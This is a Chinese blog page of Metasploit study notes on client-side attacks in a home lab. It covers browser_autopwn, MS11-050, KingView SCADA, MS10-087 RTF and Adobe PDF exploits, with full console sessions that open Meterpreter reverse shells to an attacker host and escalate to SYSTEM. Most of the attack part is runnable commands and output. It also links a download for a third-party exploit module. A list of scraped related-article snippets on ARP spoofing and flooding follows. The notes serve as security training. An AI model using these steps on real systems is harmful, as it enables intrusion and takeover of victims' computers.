青蛙爱轮滑
青蛙爱轮滑

《Metasploit 魔鬼训练营》06 客户端渗透攻击

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程

  1. MSF 中自动化浏览器攻击
  2. MS11-050 安全漏洞
  3. KingView 渗透攻击过程
    4.MS10-087 安全漏洞
  4. Adoba阅读器渗透攻击案例

###1.MSF 中自动化浏览器攻击 ###

msf auxiliary(browser_autopwn2) > search browser_autopwn

Matching Modules
================

   Name                               Disclosure Date  Rank    Description
   ----                               ---------------  ----    -----------
   auxiliary/server/browser_autopwn                    normal  HTTP Client Automatic Exploiter
   auxiliary/server/browser_autopwn2  2015-07-05       normal  HTTP Client Automatic Exploiter 2 (Browser Autopwn)


msf auxiliary(browser_autopwn2) > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options 

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf auxiliary(browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set URIPATH auto
URIPATH => auto
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Starting exploit modules on host 10.10.10.128...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/KEQN
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp                                [*] Using URL: http://10.10.10.128:8080/DojeEicHhli
[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080\auto 之后
# 返回查看 msf 信息
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Sending HTML...
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/wXWj.swf
[*] 10.10.10.254     adobe_flash_hacking_team_uaf - Sending SWF...
[*] 10.10.10.254     wellintech_kingscada_kxclientdownload - Requested: /SzjZbOOOH/OMcEvw/
[*] 10.10.10.254     wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hjZLLYcGnJhR
[*] Server started.
[*] 10.10.10.254     ms14_064_ole_code_execution - Sending exploit...
[*] 10.10.10.254     ms14_064_ole_code_execution - Sending VBS stager
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.254:1062) at 2017-09-20 02:02:34 -0400
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VAMgZvloTyhw
[*] --- Done, found 20 exploit modules

[*] Using URL: http://10.10.10.128:8080/auto
[-] Auxiliary failed: Rex::RuntimeError The supplied resource '/auto' is already added.
[-] Call stack:
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:411:in `add_resource'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:188:in `start_service'
[-]   /usr/share/metasploit-framework/lib/msf/core/exploit/tcp_server.rb:49:in `exploit'
[-]   /usr/share/metasploit-framework/modules/auxiliary/server/browser_autopwn.rb:171:in `run'
[*] Cleaning up exploits...
[*] Server stopped.

###2. MS11-050 安全漏洞 ###

msf > search ms11_050
	Matching Modules
	================
	   Name                                                    Disclosure Date  Rank    Description
	   ----                                                    ---------------  ----    -----------
	   exploit/windows/browser/ms11_050_mshtml_cobjectelement  2011-06-16       normal  MS11-050 IE mshtml!CObjectElement Use After Free
msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement 
msf exploit(ms11_050_mshtml_cobjectelement) > info 
		   Name: MS11-050 IE mshtml!CObjectElement Use After Free
		 Module: exploit/windows/browser/ms11_050_mshtml_cobjectelement
	   Platform: Windows
	 Privileged: No
		License: Metasploit Framework License (BSD)
		   Rank: Normal
	  Disclosed: 2011-06-16
	Provided by:
	  d0c_s4vage
	  sinn3r 
	  bannedit 
	Available targets:
	  Id  Name
	  --  ----
	  0   Automatic
	  1   Internet Explorer 7 on XP SP3
	  2   Internet Explorer 7 on Windows Vista
	  3   Internet Explorer 8 on XP SP3
	  4   Internet Explorer 8 on Windows 7
	  5   Debug Target (Crash)
	Basic options:
	  Name       Current Setting  Required  Description
	  ----       ---------------  --------  -----------
	  OBFUSCATE  false            no        Enable JavaScript obfuscation
	  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
	  SRVPORT    8080             yes       The local port to listen on.
	  SSL        false            no        Negotiate SSL for incoming connections
	  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
	  URIPATH                     no        The URI to use for this exploit (default is random)
	Payload information:
	  Space: 500
	  Avoid: 6 characters
	Description:
	  This module exploits a use-after-free vulnerability in Internet 
	  Explorer. The vulnerability occurs when an invalid  tag 
	  exists and other elements overlap/cover where the object tag should 
	  be when rendered (due to their styles/positioning). The 
	  mshtml!CObjectElement is then freed from memory because it is 
	  invalid. However, the mshtml!CDisplay object for the page continues 
	  to keep a reference to the freed  and attempts to call a 
	  function on it, leading to the use-after-free. Please note that for 
	  IE 8 targets, JRE (Java Runtime Environment) is required to bypass 
	  DEP (Data Execution Prevention).
	References:
	  https://cvedetails.com/cve/CVE-2011-1260/
	  OSVDB (72950)
	  https://technet.microsoft.com/en-us/library/security/MS11-050
	  http://d0cs4vage.blogspot.com/2011/06/insecticides-dont-kill-bugs-patch.html
msf exploit(ms11_050_mshtml_cobjectelement) > set payload windows/meterpreter/reverse_http
	payload => windows/meterpreter/reverse_http
msf exploit(ms11_050_mshtml_cobjectelement) > show options 
	Module options (exploit/windows/browser/ms11_050_mshtml_cobjectelement):
	   Name       Current Setting  Required  Description
	   ----       ---------------  --------  -----------
	   OBFUSCATE  false            no        Enable JavaScript obfuscation
	   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
	   SRVPORT    8080             yes       The local port to listen on.
	   SSL        false            no        Negotiate SSL for incoming connections
	   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
	   URIPATH                     no        The URI to use for this exploit (default is random)
	Payload options (windows/meterpreter/reverse_http):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
	   LHOST                      yes       The local listener hostname
	   LPORT     8080             yes       The local listener port
	   LURI                       no        The HTTP Path
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(ms11_050_mshtml_cobjectelement) > set URIPATH ms11050
	TH => ms11050
msf exploit(ms11_050_mshtml_cobjectelement) > set LHOST 10.10.10.128
	OST => 10.10.10.128
msf exploit(ms11_050_mshtml_cobjectelement) > set LPORT 8443
msf exploit(ms11_050_mshtml_cobjectelement) > exploit 
	[*] Exploit running as background job.
	[*] Started HTTP reverse handler on http://10.10.10.128:8443
	[*] Using URL: http://0.0.0.0:8080/ms11050
	msf exploit(ms11_050_mshtml_cobjectelement) > [*] Local IP: http://10.10.10.128:8080/ms11050
	[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080/ms11050 之后
# 返回查看 msf 信息	
	[*] 10.10.10.254     ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
	[*] 10.10.10.254     ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...
	[*] 10.10.10.254     ms11_050_mshtml_cobjectelement - Sending exploit (Internet Explorer 7 on XP SP3)...

 
  
###3.KingView 渗透攻击过程 ###
 
  
http://www.cnblogs.com/justforfun12/p/5324408.html
链接:http://pan.baidu.com/s/1geScJa7 密码:r9a5
放在 /usr/share/metasploit-framework/modules/exploits/windows/browser 这个目录

msf > search kingview
	Matching Modules
	================
	   Name                                                         Disclosure Date  Rank    Description
	   ----                                                         ---------------  ----    -----------
	   exploit/windows/browser/kingview_SCADA_activeX_validateuser  2011-03-07       normal  KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow
	   exploit/windows/fileformat/kingview_kingmess_kvl             2012-11-20       normal  KingView Log File Parsing Buffer Overflow
	   exploit/windows/scada/KingView6.53overflow                                    good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
	   exploit/windows/scada/KingView6.53overflow                                    good    Kingview 6.53 SCADA HMI HistorySvr Heap Overflow

msf > use exploit/windows/browser/kingview_SCADA_activeX_validateuser 
msf exploit(kingview_SCADA_activeX_validateuser) > show options 
	Module options (exploit/windows/browser/kingview_SCADA_activeX_validateuser):
	   Name     Current Setting  Required  Description
	   ----     ---------------  --------  -----------
	   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
	   SRVPORT  8080             yes       The local port to listen on.
	   SSL      false            no        Negotiate SSL for incoming connections
	   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
	   URIPATH  /                yes       The URI to use.
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(kingview_SCADA_activeX_validateuser) > set URIP
	set URIPATH  set URIPORT  
msf exploit(kingview_SCADA_activeX_validateuser) > set URIPATH kingview
	URIPATH => kingview
msf exploit(kingview_SCADA_activeX_validateuser) > set payload windows/meterpreter/reverse_http
	payload => windows/meterpreter/reverse_http
msf exploit(kingview_SCADA_activeX_validateuser) > set LHOST 10.10.10.128
	LHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set SRVHOST 10.10.10.128
	SRVHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set LPORT 8443
	LPORT => 8443
msf exploit(kingview_SCADA_activeX_validateuser) > exploit 
	[*] Exploit running as background job.

	[*] Started HTTP reverse handler on http://10.10.10.128:8443
	[*] Using URL: http://10.10.10.128:8080/kingview
	[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080/kingview 之后
# 返回查看 msf 信息
	[-] 10.10.10.254     kingview_SCADA_activeX_validateuser - Exception handling request: No encoders encoded the buffer successfully.
	[*] 10.10.10.254     kingview_SCADA_activeX_validateuser - Sending KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow to 10.10.10.254:1045...



 
  
###4.MS10-087 安全漏洞 ###
 
  
# 先生成渗透文件
msf > search ms10_087
	Matching Modules
	================
	   Name                                                    Disclosure Date  Rank   Description
	   ----                                                    ---------------  ----   -----------
	   exploit/windows/fileformat/ms10_087_rtf_pfragments_bof  2010-11-09       great  MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 
msf exploit(ms10_087_rtf_pfragments_bof) > show options 
	Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   FILENAME  msf.rtf          yes       The file name.
	Exploit target:
	   Id  Name
	   --  ----
	   0   Automatic
msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec 
	payload => windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set CMD calc.exe
	CMD => calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
	FILENAME => ms10087.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > exploit 
	[*] Creating 'ms10087.rtf' file ...
	[+] ms10087.rtf stored at /root/.msf4/local/ms10087.rtf
# 将渗透文件  /root/.msf4/local/ms10087.rtf 拷贝到靶机中并打开
# 弹出一个计算器,攻击成功


 
  
###5. Adoba阅读器渗透攻击案例 ###
 
  
# 配置测试模块生成文件
msf > search adobe_cool

Matching Modules
================

   Name                                            Disclosure Date  Rank   Description
   ----                                            ---------------  ----   -----------
   exploit/windows/browser/adobe_cooltype_sing     2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
   exploit/windows/fileformat/adobe_cooltype_sing  2010-09-07       great  Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow


msf > use exploit/windows/fileformat/adobe_cooltype_sing 
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(adobe_cooltype_sing) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(adobe_cooltype_sing) > set LPORT 8443
LPORT => 8443
msf exploit(adobe_cooltype_sing) > set FILENAME 2.pdf
FILENAME => 2.pdf
msf exploit(adobe_cooltype_sing) > run

[*] Creating '2.pdf' file...
[+] 2.pdf stored at /root/.msf4/local/2.pdf

# 将文件复制到靶机


# 启动监听端
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(handler) > show options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_http):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.128     yes       The local listener hostname
   LPORT     8080             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started HTTP reverse handler on http://10.10.10.128:8080


# 靶机打开文件后 msf 显示
[*] http://10.10.10.128:8443 handling request from 10.10.10.254; (UUID: duvbthou) Staging x86 payload (958035 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.128:8443 -> 10.10.10.254:1048) at 2017-09-20 11:08:55 -0400
[*] Session ID 1 (10.10.10.128:8443 -> 10.10.10.254:1048) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is acrord32.exe (2136) as: DH-CA8822AB9589\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (716)
[+] Successfully migrated to services.exe (716) as: NT AUTHORITY\SYSTEM




 
  

                            
                        
                    
                    
                    

                    
                    
                    

                
                

                    
                

            
        
    
    

        
你可能感兴趣的:(kali-linux)

        

            

                
    
                    
  • ARP欺骗(断网测试)
                        Passion-优
网络安全网络攻击模型测试工具
                        
    一.测试实验环境1.软件:VMwareWorkstations14以上版本2.虚拟机:Kali-Linux、Windows71)打开虚拟机:启动kali-linux启动windows7(未装补丁)2)获取IP地址(ifconfig、ipconfig)Kali-Linux:192.168.164.129Windows7:192.168.164.138二.实验步骤具体攻击实现具体的中间人攻击,大体上可
    
                    
    • 
                    
  • ❖ Kali-linux 初识
                        Solomon_Xie

                        
    基本我发现Kali-linux其实不用安装,直接在光盘里运行也能很好的完成几乎所有需要的任务。Kali默认账户就直接是root,默认密码是toor,反过来罢了。Kali默认SSH都开启的,只是端口没开启。所以想从别的地方ssh进来,需要改一下sshd的配置/etc/ssh/ssd_config,只需把端口22那一行取消注释即可。Kali主要就方便在默认就安装好了一系列常用的程序,相当于一个“精装修
    
                    
    • 
                    
  • Kali-Linux 使用evillimiter,采用arp欺骗,限制上网速度
                        坦笑&&life
网络安全linux运维服务器
                        
    Kali-Linux使用evillimiter,采用arp欺骗,限制上网速度1.首先下载evillimiter工具///从github上下载此工具gitclonehttps://github.com/bitbrute/evillimiter.git2.使用cd命令进入此工具目录cdevillimiter3.使用Python3安装此工具(安装方法可自行百度)sudopython3setup.pyin
    
                    
    • 
                    
  • Kali-linux + VMware安装
                        came_861
linux服务器
                        
    目录一、kali镜像下载二、安装过程:一、kali镜像下载下载地址:https://mirrors.tuna.tsinghua.edu.cn/kali-images/kali-2022.4/二、安装过程:打开vmware,创建新的虚拟机选择“自定义(高级)”:选择已经下载好的镜像文件的路径(也可以选择稍后安装)选择如图设置命名虚拟机的名称、选择该虚拟机安装位置按照图中设置这里可根据个人电脑设备情况
    
                    
    • 
                    
  • kali-Linux安装ARL灯塔教程以及timeout of 20000ms exceeded 的解决方法
                        是liku不是里库
WEB安全linux运维服务器
                        
    FLAG:别和妈妈诉苦,她帮不上,也睡不着。专研方向:docker,ARL资产灯塔系统每日emo:天冷了,你还在坚持吗?欢迎各位与我这个菜鸟交流学习kali安装ARL灯塔教程1.安装docker环境,有了就跳过aptinstalldocker.io2.确保安装成功,查看docker版本dockerversion出现即算成功安装3.docker安装成功后重启即可reboot4.安装arl灯塔,两种方
    
                    
    • 
                    
  • 渗透测试实战之ARP欺骗攻击(ARP断网攻击)
                        爱玩游戏的黑客
网络基础网络网络安全linux服务器
                        
    一、实训目的:通过实训理解ARP欺骗的原理掌握中间攻击的方法。二、场景描述:在虚拟机环境下配置“Win7”和“KaliLinux”虚拟系统,使得2个系统之间能够相互通信,网络拓扑如图所示。三、实验环境:1.软件:VMwareWorkstations14以上版本2.虚拟机:Kali-Linux、Windows71)打开虚拟机:启动kali-linux启动windows7(未装补丁)2)获取IP地址(
    
                    
    • 
                    
  • 如何在Kali-Linux中进行cc攻击
                        Albart575
linuxddos
                        
    cc攻击原理:CC攻击的原理就是攻击者控制某些主机不停地发大量数据包给对方服务器造成服务器资源耗尽,一直到宕机崩溃。CC主要是用来消耗服务器资源的,每个人都有这样的体验:当一个网页访问的人数特别多的时候,打开网页就慢了,CC就是模拟多个用户(多少线程就是多少用户)不停地进行访问那些需要大量数据操作(就是需要大量CPU时间)的页面,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连
    
                    
    • 
                    
  • Kali-linux新手教程,分辨率推荐,中文配置,中文输入法,VScode配置,root配置
                        半只野指针
linuxvscode运维网络安全
                        
    Kali-linux新手教程(基于vm和22.04版本kali)1.VM分辨率问题vm的kali的字体是比较小的,根据经验;建议开1280*720,并且勾选自由拉伸2.解决初始化使用root问题在初始化界面按e进入初始化高级菜单(这里实际上是修改boot目录下某些文件达到目的)注意到在GRUB界面下的红框部分roquietsplash修改为rwquietsplashinit=/bin/bash使用
    
                    
    • 
                    
  • 如何在Hyper-V中安装Kali-Linux系统
                        Albart575
linux运维服务器
                        
    一、下载kali镜像在官网下载GetKali|KaliLinux下载这个二、创建Hyper-V虚拟机在搜索框搜索启用和关闭Windows功能之后打开选择下面这几个功能这是windows专业版的功能,家庭版没有,想要获取请参考Win10家庭中文版安装Hyper-V-知乎(zhihu.com)安装好后重启电脑,在搜索框中搜索Hyper-V,打开,在管理器的界面,选择右边的“新建”点虚拟机之后点击下一步
    
                    
    • 
                    
  • Kali-Linux常用命令
                        狙个栗子
linux服务器运维
                        
    Kali-Linux常用命令一.lsls/dev-l#以一种长列表格式展示路径下的文件drwxr-xr-xd表示文件属性为一个目录,后面字符三个一组,分别表示文件所有者,文件所属组,其他用户对该文件所拥有的权限(r-读(权重4),w-写(权重2),x-执行(权重1))ls/dev-alh--sort=size长列表展示/dev目录下的所有文件,直观展示文件大小并按照文件大小进行排序a即all,所有
    
                    
    • 
                    
  • 适用于 Linux 的 Windows 子系统 (WSL)
                        BinaryMoon
WindowsUNIXLikeToollinuxwindows运维
                        
    适用于Linux的Windows子系统(WSL)描述什么是“适用于Linux的Windows子系统”系统要求Windows10。Windows11。查看计算机系统的版本虚拟化功能启用虚拟化功能禁用虚拟化功能检测是否开启虚拟化功能使用WSL运行Linux的各类发行版查看可供安装的Linux各类发行版安装KaliLinuxRolling安装相关的软件开启Hyper-V功能安装kali-linux发行版
    
                    
    • 
                    
  • 安鸾渗透实战平台——SSH离线破解 (250分)
                        阿文、...
安鸾渗透实战平台ssh安全linux
                        
    漏洞环境安鸾渗透实战平台kali(john):linux密码攻击工具;详情了解请转到这位师傅的博客:https://www.fujieace.com/kali-linux/courses/john.html题目打开压缩包会得到两个文件字典文件shadow:1、Linux操作系统下有一个文件负责所有用户的密码。那就是shadow;2、/etc/shadow文件中的记录行与/etc/passwd中的一
    
                    
    • 
                    
  • Kali-linux:nmap命令
                        胖哥王老师
linux知识nmapkalilinuxkali漏洞扫描
                        
    概念Nmap用于在远程机器上探测网络,执行安全扫描,网络审计和搜寻开放端口。它会扫描远程在线主机,该主机的操作系统,包过滤器和开放的端口。使用场景掌握了具体使用场景,主要就是掌握如下参数使用:以192.168.31.18为目标靶机1.普通扫描root@sunjin:/home/sunjin#nmap192.168.31.18StartingNmap7.80(https://nmap.org)at2
    
                    
    • 
                    
  • VMware虚拟机安装Kali-Linux
                        qmkn
Linux
                        
    安装Kali-Linux:史上最详细的VM虚拟机安装Kali-linux教程(以2020.1版本为例,含下载地址+默认提升为root权限)2021.1安装kaliLinux最新版本虚拟机两个链接都可以安装VM虚拟机:VM
    
                    
    • 
                    
  • Kali Linux渗透测试技术详解_渗透测试入门
                        哈喽沃德er
linux系统安全网络
                        
    知识点1.KaliLinux是做渗透测试用的2.安装VMwareWorkstation虚拟机3.安装kali-linux系统4.基本用法-重新设置root密码5安装debian11系统-默认命令行模式登录1.KaliLinux是做渗透测试用的渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析。渗透测试与其他评估方法不
    
                    
    • 
                    
  • Windows10 WSL安装kali-linux
                        ghostliner
linuxwindows
                        
    Windows10WSL安装kali-linuxWindows10安装WSL参考:安装WSL|MicrosoftLearn前言适用于Linux的Windows子系统(WSL)可让开发人员直接在Windows上按原样运行GNU/Linux环境(包括大多数命令行工具、实用工具和应用程序),且不会产生传统虚拟机或双启动设置开销。系统需求必须运行Windows10版本2004及更高版本(内部版本19041
    
                    
    • 
                    
  • nmap参数
                        孤君蓑笠翁

                        
    0x00nmap使用背景Nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端,并且推断计算机运行哪个操作系统。它是网络管理员必用的软件之一,以及用以评估网络系统安全。网上有不少介绍nmap使用的方法,但是本文主要介绍在实践中,很有成效并且经常会用到的命令。0x01nmap使用方法#以下的实践方案均是基于KALI-LINUX进行的,但是只要在安装有nmap
    
                    
    • 
                    
  • 穷举爆破神器hydra详细讲解和利用
                        maverickpig
渗透测试自学日志之基础原理篇安全web安全
                        
    渗透测试自学笔记,想把自己所学的完整记录下来关于Hydrahydra是一个支持众多协议的爆破工具,已经集成到Kali-Linux中,直接在终端打开即可,同时也有Windows版(链接)Windows版Kali版你可以在Github上找到它的源码:https://github.com/vanhauser-thc/thc-hydraHydra使用hydra有两个版本命令行版本GUI版本其中GUI版本叫
    
                    
    • 
                    
  • Kali-linux查看打开的端口
                        网络安全百宝库(一)
linux网络服务器web安全网络安全
                        
    对一个大范围的网络或活跃的主机进行渗透测试,必须要了解这些主机上所打开的端口号。在KaliLinux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口,本节将介绍Nmap和Zenmap工具的使用。4.4.1TCP端口扫描工具Nmap使用Nmap工具查看目标主机192.168.41.136上开放的端口号。执行命令如下所示:root@kali:~#nmap1
    
                    
    • 
                    
  • sqlmap的安装与使用
                        乔治777
sqlweb安全
                        
    文章目录sqlmap的安装sqlmap的使用Windows下的sqlmap:get方式注入post方式注入kali-linux下的sqlmap(待更新)sqlmap的安装准备工作:(1)python2.7.18(只能安装2.6--3.0版本)下载地址:https://www.python.org/downloads/安装时:直接next将“Addpython.exetoPath”项勾选,勾选后安装
    
                    
    • 
                    
  • Kali-linux攻击路由器
                        网络安全百宝库(一)
linux智能路由器网络网络安全Kali
                        
    前面介绍的各种工具,都是通过直接破解密码,来连接到无线网络。由于在一个无线网络环境的所有设备中,路由器是最重要的设备之一。通常用户为了保护路由器的安全,通常会设置一个比较复杂的密码。甚至一些用户可能会使用路由器的默认用户名和密码。但是,路由器本身就存在一些漏洞。如果用户觉得对复杂的密码着手可能不太容易。这时候,就可以利用路由器自身存在的漏洞实施攻击。本节将介绍使用Routerpwn工具实施攻击路由
    
                    
    • 
                    
  • Kali-linux密码在线破解
                        网络安全百宝库(一)
linux网络安全网络安全Kali
                        
    为了使用户能成功登录到目标系统,所以需要获取一个正确的密码。在Kali中,在线破解密码的工具很多,其中最常用的两款分别是Hydra和Medusa。本节将介绍使用Hydra和Medusa工具实现密码在线破解。8.1.1Hydra工具Hydra是一个相当强大的暴力密码破解工具。该工具支持几乎所有协议的在线密码破解,如FTP、HTTP、HTTPS、MySQL、MSSQL、Oracle、Cisco、IMA
    
                    
    • 
                    
  • Kali-linux无线网络嗅探工具Kismet
                        网络安全百宝库(一)
linux服务器网络Kali网络安全
                        
    如果要进行无线网络渗透测试,则必须先扫描所有有效的无线接入点。刚好在KaliLinux中,提供了一款嗅探无线网络工具Kismet。使用该工具可以测量周围的无线信号,并查看所有可用的无线接入点。本节将介绍使用Kismet工具嗅探无线网络。(1)启动Kismet工具。执行命令如下所示:root@kali:~#kismet执行以上命令后,将显示如图9.1所示的界面。图9.1终端延伸(2)该界面用来设置是
    
                    
    • 
                    
  • 虚拟机-安装与使用2023
                        逸佳6
linux运维服务器
                        
    虚拟机-安装与使用前言一、虚拟机1.VMware2.Virtualbox二、VMware的下载三、VMware的安装四、验证是否安装成功五、运行VMware六、VMware上安装其它操作系统安装Windows10安装CentOS-Linux安装Kali-Linux七、VMware常用功能同步时间系统备份克隆快照内存设置八、安装过程时遇到的问题九、总结前言最近学习elasticsearch,但是es
    
                    
    • 
                    
  • VMware安装 kali-linux出现的报错:未能启动虚拟机
                        Kasusa
linux运维服务器
                        
    VMware安装kali-linux出现的报错:未能启动虚拟机右键-兼容性,改成vm16.发生错误,导致虚拟CPU进入关闭状态找到.vmx文件,搜索并修改成:virtualHW.version="16"
    
                    
    • 
                    
  • VMware 之安装 kali-linux 操作步骤
                        何文礼

                        
    1.安装linux版的VMware-tools1.1找到VMwareworkstations的安装目录下的linux.isolinux.iso导入镜像文件linux.isolinux。iso1.2进行光盘挂载,挂载命令:root@kali:/#mount/dev/sr0/mnt未连接光驱查看光盘内容并解压VMwareTools-10.3.10-13959562.tar.gz压缩包,进入目录进行安装
    
                    
    • 
                    
  • 口令暴力破解--Ftp协议暴力破解与Ssh协议暴力破解
                        知不足,而学习
杂文服务器网络linux
                        
    Ftp协议暴力破解FTP服务检测FTP服务FTP是一种文件传输协议,FTP服务默认端口为21。利用FTP服务器可以在本地主机和远程主机间进行文件传输。当FTP没有配置好安全控制,如对登录的源地址及密码尝试次数做限制,那么就会存在暴力破解可能。本次靶机服务器地址:193.168.1.23Nmap扫描打开kali-linux虚拟机,利用kali-linux自带的nmap扫描:nmap–v–A–Pn19
    
                    
    • 
                    
  • 由于未安装所需的特性,无法启动操作
                        Jacky1008611
wsllinux其他windows
                        
    由于未安装所需的特性,无法启动操作win10的wsl升级成wsl2时需要在windowsTerminal中输入wsl--set-versionUbuntu2,来把安装好的Ubuntu升级成wsl2版本。但是报错:由于未安装所需的特性,无法启动操作。而翻遍百度也没有解决方案。同时,下载其他的Linux版本,比如:Kali-linux。启动时,会报:WSL2InstallingLinuxfailed,
    
                    
    • 
                    
  • 树莓派 kali 安装raspi-config
                        欧阳睿
树莓派raspberrypi
                        
    文章目录下载raspi-config安装包执行安装命令  树莓派官方系统预装有raspi-config,但是比如Ubuntu、kali系统并没有安装。以此文简单记录kali-linux安装raspi-config的过程。下载raspi-config安装包  前往官网下载最新版安装包下载地址:http://archive.raspberrypi.org/debian/pool/main/r/rasp
    
                    
    • 
                    
  • 虚拟机-安装与使用(详细教程)
                        多加点辣也没关系
安装教程linux运维java
                        
    虚拟机-安装与使用前言一、虚拟机1.VMware2.Virtualbox二、VMware的下载三、VMware的安装四、验证是否安装成功五、运行VMware六、VMware上安装其它操作系统1.安装Windows102.安装CentOS-Linux3.安装Kali-Linux七、VMware常用功能1.同步时间2.系统备份1.克隆2.快照3.内存设置八、安装过程时遇到的问题九、总结前言最近学习el
    
                    
    • 
                                
  • Java实现的简单双向Map,支持重复Value
                                    superlxw1234
java双向map
                                    
    关键字:Java双向Map、DualHashBidiMap 
  
  
有个需求,需要根据即时修改Map结构中的Value值,比如,将Map中所有value=V1的记录改成value=V2,key保持不变。 
  
数据量比较大,遍历Map性能太差,这就需要根据Value先找到Key,然后去修改。 
  
即:既要根据Key找Value,又要根据Value
    
                                
    • 
                                
  • PL/SQL触发器基础及例子
                                    百合不是茶
oracle数据库触发器PL/SQL编程
                                    
      
触发器的简介; 
触发器的定义就是说某个条件成立的时候,触发器里面所定义的语句就会被自动的执行。因此触发器不需要人为的去调用,也不能调用。触发器和过程函数类似 过程函数必须要调用, 
  
一个表中最多只能有12个触发器类型的,触发器和过程函数相似 触发器不需要调用直接执行,


 
触发时间:指明触发器何时执行,该值可取:
before:表示在数据库动作之前触发
    
                                
    • 
                                
  • [时空与探索]穿越时空的一些问题
                                    comsci
问题
                                    
     
      我们还没有进行过任何数学形式上的证明,仅仅是一个猜想..... 
 
      这个猜想就是; 任何有质量的物体(哪怕只有一微克)都不可能穿越时空,该物体强行穿越时空的时候,物体的质量会与时空粒子产生反应,物体会变成暗物质,也就是说,任何物体穿越时空会变成暗物质..(暗物质就我的理
    
                                
    • 
                                
  • easy ui datagrid上移下移一行
                                    商人shang
